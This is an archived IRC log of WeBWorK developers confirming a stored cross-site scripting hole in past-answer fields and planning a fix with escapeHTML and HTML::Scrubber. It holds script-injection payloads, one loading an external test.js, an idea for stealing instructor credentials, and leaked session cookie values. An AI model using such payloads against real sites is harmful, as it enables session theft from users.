Perl 6 - the future is here, just unevenly distributed

IRC log for #webwork, 2013-04-30

| Channels | #webwork index | Today | | Search | Google Search | Plain-Text | summary

All times shown according to UTC.

Time Nick Message
08:18 ilbot_bck joined #webwork
08:18 Topic for #webwork is now WeBWorK (http://webwork.maa.org) is an open-source online homework system for math and sciences courses. WeBWorK is supported by the MAA and the NSF. | Release notes: http://goo.gl/Ry5HN | Channel logged at http://goo.gl/jELTn
12:08 mgage joined #webwork
13:16 goehle joined #webwork
14:01 aubreyja joined #webwork
14:18 Paul_Pearson joined #webwork
15:08 mgage joined #webwork
16:05 Paul_Pearson joined #webwork
16:24 goehle hey mgage
16:26 Paul_Pearson1 joined #webwork
16:53 rbeezer joined #webwork
17:42 mgage goehle: hi
17:42 goehle hey
17:43 mgage what's up?
17:43 goehle that bug that just came in is related to something I was dealing with earlier
17:43 mgage the authen bug?
17:43 goehle yeah
17:43 goehle I was getting authen errors the first visit to the login page
17:44 mgage haven't had a chance to look at it directly -- are these errors where the cookie and the session key have different values?
17:44 goehle No
17:44 goehle When external authenication is enabled
17:44 goehle when I visited the login page for a course for the first time
17:44 goehle I was getting an authentication error
17:44 goehle (before any authentication had even been submitted.)
17:45 goehle I changed the conditionals to fix that, but I dont think it was the right fix.  You eventually changed those conditionals to something else.
17:46 goehle https://github.com/goehle/webwork2/commits/master/lib/WeBWorK/Authen.pm
17:47 mgage ok -- that's not the error in the bug report -- that error is around line 235
17:48 goehle they aren't the same?
17:48 mgage no
17:49 mgage the fix I made in line 150 just added necessary parens for the defined() function  I think the original clause was always false.
17:49 goehle hmm
17:50 goehle ok in my August 20th commit I made a stab at fixing my issue
17:50 goehle https://github.com/goehle/webwork2/commit/7f039c033d7a247b96cda9dc3d3950bebe7180ea
17:50 mgage the bug report error looks like it is just changing the error message to something more sensible
17:50 goehle which is changing the 235 entry
17:50 goehle Isn't the bug report about the authentication module supressing the errors of the external authentication?
17:51 goehle (the error message stuff was kind of an addendum)
17:51 goehle Then in your August 28 commit you made a better fix
17:51 goehle https://github.com/goehle/webwork2/commit/e3a1c34f18f555761164cf09bf7bc30383eda975
17:53 goehle And thats the one pointed out in the bug report
17:53 goehle mostly I just wanted to let you know that may be the source of this particular bug
17:55 mgage ok -- I'll have to look at it later -- Nabor is right that it is overwriting the original error -- I think in an attempt to give a friendlier message.
17:55 mgage do you know about "blame"? https://github.com/goehle/webwork2/blame/e3a1c34f18f555761164cf09bf7bc30383eda975/lib/WeBWorK/Authen.pm
17:56 goehle oh thats a way easier way of looking at it
17:56 goehle how do you get to that?
17:56 mgage start looking at files -- then blame appears in the upper right above the files
17:57 goehle I see
17:58 goehle oh interesting
17:58 goehle thats telling you what commit each line came from
17:58 goehle ok
17:58 goehle so the commit for the lines in questions came from your commit
17:58 goehle but your commit was in response to my earlier commit
17:59 mgage actually from wheeler I think
17:59 mgage probably depends on which version you are looking at -- I
17:59 goehle wait maybe I dont understand
17:59 mgage I'm lookinga t your repo
18:00 goehle is the accidental supression caused by the conditional on like 235
18:00 goehle or the conditional on line 237?
18:00 mgage both -- and it may be a suppression of the error message to prevent XSS
18:01 goehle oh wait, I think I was misunderstanding
18:01 goehle so the bug isn't that there is no error report being generated
18:01 goehle is that he wants the error report (which is being generated correctly) to include the output from the external authenticator
18:02 mgage the original error is replaced by this generic message
18:02 goehle could you really do xss that way?
18:02 mgage yes -- we had all kinds of examples of that which we got rid of -- there are probably still many left
18:03 goehle how do you even insert the script?  would you need control over the authenticator?
18:03 mgage no you just send something that creates an error -- then if the error message includes the code that caused the error it is returned and inserted into the viewers browser
18:04 goehle woudlnt' that only cause you to xss yourself though?
18:04 mgage no -- you place the link on an open website and then the unsuspected person clicks on it
18:05 goehle so it would be a webwork link, with the malicious authentication credentials included as part of the html code
18:05 mgage yes
18:06 goehle devious.  Although if you are getting people to click on links then you could send them directly to the site hosting the malicious script
18:06 goehle anyway, this has been super informative, if not particularly helpful for you :)
18:06 mgage np
18:36 goehle this xss talk inspired me to check some stuff out
18:36 goehle what should I do about a hole I found?
18:36 goehle fix it I suppose
18:36 goehle but what should I use as my base, and where should I submit it?
18:42 Paul_Pearson joined #webwork
18:42 mgage if it's a hot fix for master -- pull a fresh copy of the master branch from openwebwork/webwork2, patch it and submit it.
18:42 goehle so the issue is with the fact that we repopulate the text fields with the past answers.  if the past answer has html then that gets rendered
18:43 goehle does htis qualify as a hotfix?
18:43 mgage if it's less urgent then pull from  release/2.7 and do the same.
18:43 goehle my friend colin was tellign me how I could use this to steal professor login credentials from any professor who viewed the page (like via a email professor link)
18:43 mgage no -- that isn't even an issue in 2.6 I don't think -- essayQuestions start in 2.7
18:44 goehle this is for any question
18:44 goehle not just essay questions
18:45 mgage ok -- this is another javaScript injection technique I think.  -- if you are sure about it -- then it's probably a 2.6 hotfix.
18:45 mgage the solution is some kind of htmlEscape for past answers I would guess.
18:46 goehle eh well lets confirm
18:46 goehle go to a webwork page
18:46 goehle and plug
18:46 goehle "><script type="javascript">alert('foo')</script>
18:46 goehle into an answer
18:47 goehle now, chrome was preventing this from running in the console
18:47 goehle but it was definitelly getting rendered as js
18:47 goehle so a smarter attack should do something
18:48 goehle or try "><b>HI</b>
18:48 goehle the HI gets rendered in bold
18:49 mgage I haven't been able to get this actually run javaScript in safari yet -- funny things do happen with the HTML however
18:49 goehle yeah, I haven't been able to get it to run in crhome
18:50 goehle I get errors that look like
18:50 goehle "><b>HI</b>
18:50 goehle Refused to execute a JavaScript script. Source code of script found within request.
18:50 mgage he is right however that there is potential hole in that practice.  the difficulty will be escaping it without causing errors in the math
18:50 goehle does that matter?
18:50 goehle so if you submit that
18:51 goehle it gets recorded as a past answer
18:51 goehle even if its completely wrong
18:51 goehle then you hit email instructor
18:51 goehle and when they view the page the answer gets plugged into the text box
19:00 mgage I haven't been able to get it to execute in any browser -- it's trapped by the parser   -- it does repeat back the input unescaped however -- which is a potential weak point.
19:03 goehle ok
19:03 goehle try this
19:03 goehle go to firefox
19:04 goehle (chrome is too smart for me to break)
19:04 goehle "><script src="http://agora.cs.wcu.edu/~goehle/test.js"></script>
19:04 goehle plug that in for any answer
19:06 mgage I get "unexpected character "   errors.
19:07 goehle sure
19:07 goehle but did you get a popup
19:07 mgage no
19:07 goehle hmm
19:07 goehle I did
19:07 goehle which course/version are you using
19:08 mgage I've tried several -- but I'm on ww_version 2.7
19:08 goehle try it on my hosted 2 page
19:08 goehle course
19:09 mgage https://hosted2.webwork.rochester.edu/webwork2/goehle_course/Calculus_I/1/
19:10 mgage I do get the error message about running javaScript on chrome
19:10 goehle I'm getting a hash reference  error?
19:10 goehle nm
19:11 mgage ok -- I have it giving a pop up on firefox now
19:11 goehle yeah
19:11 goehle and the crhome thing is chrom being super smart
19:11 goehle it does a lot of proactive stuff in terms of xss
19:14 mgage yes -- I can't get the alert message to fail on firefox -- I can get the source read from your test.js file
19:15 goehle huh?
19:15 goehle cant get it to fail?
19:15 mgage it reads a cookie:  WeBWorKCourseAuthen.goehle_course=gage%095iZ37ZkbwGxhHYXZtMQxIa3tL8u045st%091367349122; WeBWorKCourseAuthen.gage_demo=gage%09U5vaAJHSfr7dAGkjAfUr6UxPqgZ3CCM1%091367349281; __utma=29573820.694403147.1363193985.1363193985.1363193985.1; __utmz=29573820.1363193985.1.1.utmccn=(organic)|utmcsr=google|utmctr=|utmcmd=organic
19:15 goehle right
19:15 goehle yeah
19:15 goehle so the js could send that cookie somewhere else
19:15 mgage but the alert isn't firing
19:15 mgage yes
19:16 goehle sorry, I"m confused again.   What do you mean the alert isn't firing?  That text above looks like the output of the alert
19:16 mgage but "><script type="javascript">alert('foo')</script>   doesn't bring up a popup
19:16 goehle ah yeah
19:17 goehle thast because firefox also does some basic xss filtering
19:17 goehle it doesn't let you define scripts in the source of the page
19:17 goehle but its fine if you pull the script from somewhere else
19:17 mgage this is definitely a hole -- the problem is that we'll need to be careful about filtering because <  /  and so forth are used in math equations
19:18 goehle actually scratch that
19:18 mgage didn't see a message in firefox -- does it appear in the firebug console?
19:18 goehle "><script>alert('foo')</script>
19:18 goehle works for me
19:18 mgage in the first answer to https://hosted2.webwork.rochester.edu/webwork2/goehle_course/Calculus_I/1/  ?
19:19 goehle actually that link gives me a webwork error
19:20 goehle ah
19:20 goehle that set wasnt assigned to me
19:20 goehle yup
19:20 goehle I do get a popup
19:20 goehle try to act as me
19:20 goehle and then just visit that probelm
19:22 mgage ok -- I have the alert popping up for me as well now.
19:22 mgage nice catch -- I have to leave for a bit -- will your friends be coming to ann arbor?  there was some talk they wanted to help with database stuff
19:23 goehle one of them
19:23 goehle he wants to pay is own way though
19:23 goehle I'm going to spend some time in the next couple of weeks going over the database code
19:24 mgage ok.  sounds good -- I won't insist :-)
19:24 mgage we might have a free room for him at least
19:24 mgage ok -- I'll be back in a little bit
19:24 goehle kk
20:13 aubreyja joined #webwork
20:16 aubreyja left #webwork
20:29 goehle does anyone know when/why webwork decides to override the source path of the problem for individual students?
21:01 mgage_ joined #webwork
21:05 goehle hey mgag_
21:05 goehle mgage_
21:06 mgage_ hi
21:06 goehle do you know why/when webwork decides to override the source path of a problem for individual students?
21:06 goehle I needed to change a problem that was broken (which means I had to change the source to a local version) and a bunch of students were stuck with the original
21:07 mgage_ not precisely -- but it's set up in ProblemDetails.pm
21:07 goehle ok, I'll take a look
21:07 goehle and you said > and < were necessary for answer input?
21:07 mgage_ I seem to remember that that can happen if they were logged in when you made the change -- I don't think I ever tracked that down
21:08 mgage_ well   3 < x  and x< 5 is a legal answer for intervals
21:08 goehle a sure
21:09 mgage_ take a look through perl modules and see what the standard is for escaping HTML these days -- there are a bunch of hand coded versions in our current code --- Davide tends to like to roll his own, and I have done this from time to time myself -- it makes me nervous however -- it seems that a uniform approach to this would be safer.
21:10 goehle well I took a shot at it
21:10 goehle what I've got now is that
21:10 goehle just before the pg is evaluated
21:10 goehle I have html::scrubber run through all of the form fields and remove scripts
21:10 goehle although that may be too much
21:10 goehle which form fields can have answers in them?
21:11 mgage_ What I would do for starters is to make sure that anything being printed back to the screen (e.g. in the preview and answer windows) is run through an htmlEscape routine.  I think that might be enough to fix this particular exploit.
21:11 mgage_ the MathObject parser can take care of itself
21:11 goehle the issue is that the problem isn't with the html being provided by Problem.pm
21:11 goehle the issue is with the html being provided by PG.pm
21:12 goehle I was thinking that we should run some sort of scrubber before the answers even get into the system
21:12 mgage_ so are we sure about this? -- because as far as I could see the answers in preview weren't escaped either
21:13 mgage_ if you run the scrubber first you have the problem of handling < in inequalities
21:13 goehle thats not so bad
21:13 goehle scrubber just replaces those with &lt;
21:13 goehle and &gt;
21:14 goehle I can just put them back
21:14 goehle as far as where
21:14 goehle it looks like there are 3 places
21:15 mgage_ yes that seems to be the kind of thing we'll have to do
21:15 goehle where the script might be turned into valid html
21:15 goehle the first is in the answer preview (in the entered box)
21:16 mgage_ that should definitely be scrubbed -- there is no reason not to do that -- not 100% sure what to do with the script included in tooltips -- that might be safe.
21:16 goehle the second is hijacking itself into the value attribute of the AnSwEr input
21:16 goehle and the third is hijacking itself into the value attribute of the previous_AnSwEr input
21:16 goehle and as far as I can tell those last two are generated by pg
21:16 mgage_ probably scrubbing things before they are put into past answers is ok
21:17 goehle now this isn't past_answer past answers
21:17 mgage_ they are generated in pg in PGbasicmacros.pl
21:17 goehle ok
21:18 mgage_ we do store previous answers in a database to keep previous work sticky.
21:18 goehle well the most recent answer is begin stored in problem->last_answer
21:18 mgage_ does html::scrubber have an unscrubber? (escapeHTML usually does) --
21:18 goehle not really
21:18 mgage_ actually I meant last_answer not past answers
21:19 goehle what html scrubber does is it removes tags
21:19 goehle so like if you scrub <script> suchandsuc </script>
21:19 goehle you end up with the empty tag
21:19 goehle do we ever input html as an answer?
21:19 mgage_ that might be a reason to use escapeHTML  -- the idea would be to make sure that anything being printed to a page -- including values in input boxes would be escaped.
21:20 mgage_ values from input boxes would be unescaped when being read into the parser and answer evaluators
21:20 mgage_ this seems pretty uniform -- and less likely to have unexpected loopholes
21:20 goehle waht does escapeHTML do again?
21:20 mgage_ I can't remember any examples of html being input --
21:21 goehle it just turns html entities into character code right?
21:21 mgage_ it replaces things like < with &lt;
21:21 mgage_ or perhaps space into %20 -- there are a couple of versions -- the latter I think was used for url's -- I'm not sure what the state of the art is
21:22 mgage_ it's been a moving target over the years
21:23 goehle so you would use escapeHTML on everything before its displayed, rather than remove html from inputs before the are processed?
21:23 mgage_ it seems simpler
21:24 goehle I could be wrong (and I've done that a lot today) but it seems more complicated to me
21:24 mgage_ it's a straight encode decode routine    --
21:24 mgage_ some balance might be required
21:24 goehle ah I see
21:24 mgage_ html::scrubber seems to give you finer control
21:25 goehle yes, the endode/decode process is more straightforward
21:25 goehle I was just thinking that it would be better not to have these things floating aroudn
21:25 goehle once you have <script> stuff stored in the db
21:25 mgage_ but I'm not sure we need that -- if someone wants to enter html into an answer a sanitized version will simply print back to them
21:25 goehle then you hvae to worry about when/how it gets displayed
21:25 goehle for example, I check ShowAnswers.pm and ProblemGrader.pm and they are fine
21:25 goehle but who knows what else is rendering .pg code
21:26 goehle and all of that would be at risk
21:26 mgage_ well we haven't used the "taint" aspects of perl -- but they are there to help detect and debug this sort of thing.
21:26 goehle how so?
21:27 mgage_ it checks to see if a variable potentially has unsafe content -- based on where it is initialized
21:28 mgage_ brb
21:28 goehle kk
21:33 mgage_ CGI::escapeHTML  should be looked at
21:33 goehle yeah
21:33 mgage_ some of this is done automatically when CGI is used
21:33 goehle I'm still torn a bit
21:34 goehle I agree that we should escape characters before they get printed
21:35 goehle so that I should go through and fix Answer Preview
21:35 goehle and all of the stuff in PGbasicmacros.pl
21:35 goehle but I am not super convinced that we should be allowing html tags in stored answers
21:35 mgage_ that's a good place to start -- then let's test and see what else is needed
21:36 mgage_ I think we should also use escapeHTML before anything is stored.
21:36 goehle but why not remove the offending tags altogether?
21:37 mgage_ mostly a principle of least action -- at least initially
21:38 mgage_ removing all tags is a bigger change and I don't think I've thought through the consequences yet.
21:38 goehle what about some tags?
21:39 goehle so html scrubber can allow a lot of things and just remove script tags and other bad ones
21:39 goehle I really cant think of a legitimate reason for having script tags in your answer
21:39 goehle (keep in mind this is in the submitted answer.   Once it gets rendered it will have scripts in it for mathjax and whatnot)
21:41 mgage_ <x | y>  for physics?
21:43 goehle sure,
21:43 goehle I'm thinking more of a blacklist than a whitelist
21:43 goehle so allow any tags
21:43 goehle but remove
21:43 goehle script, html comments, process instructions, php
21:44 goehle maybe style
21:44 mgage_ well -- I don't think a black list will do any harm -- and it could help to have it in place in case we want to selectively remove certain tags.  -- at the moment I can't seem them doing harm and I can't predict which things might actually be desirable eventually
21:46 mgage_ http://www.w3.org/Security/Faq/
21:46 goehle thats quite a read
21:47 goehle hmm
21:48 goehle I guess from a security standpoint its a bit of risk vs reward
21:50 goehle if you allow html tags in the stored answers then they could very well be rendered.  Any custom PG evaluator that doesn't use escapeHTML, for example, would render them
21:50 goehle but if you remove too much then you restrict peoples ability to do answers
21:50 goehle and PG is a complicated beast
21:50 goehle there is a lot going on there
21:51 mgage_ yes -- and it's minimal assumption that a student answer is just a string has been very valuable in creating new answer evaluators.
21:51 goehle well student answer would still be a string
21:51 goehle it would be a string that didnt' contain any html though
21:51 goehle still, I see where you are coming from
21:52 mgage_ so I'm inclined to be cautious about making restrictions.  if the html tags are escaped there is a reasonable chance they won't do damage -- although they might cause errors
21:52 mgage_ let's escapeHTML first -- and then see where we are.
21:53 goehle can I at least remove script and the other super bad ones.  Its hard to see what kind of problem could possibly be so awesome as to be worth allowing students to submit scripts as their answers
21:55 mgage_ sure -- go ahead -- it will be useful to have the html::scrubber technology in place -- and for the essayQuestions the protection will only get more complicated
21:55 goehle yeah, I may loosen Scrubber for essay questions
21:56 goehle based on what you said
23:33 goehle_ joined #webwork
23:33 goehle_ hey mgage, got time for another question :)

| Channels | #webwork index | Today | | Search | Google Search | Plain-Text | summary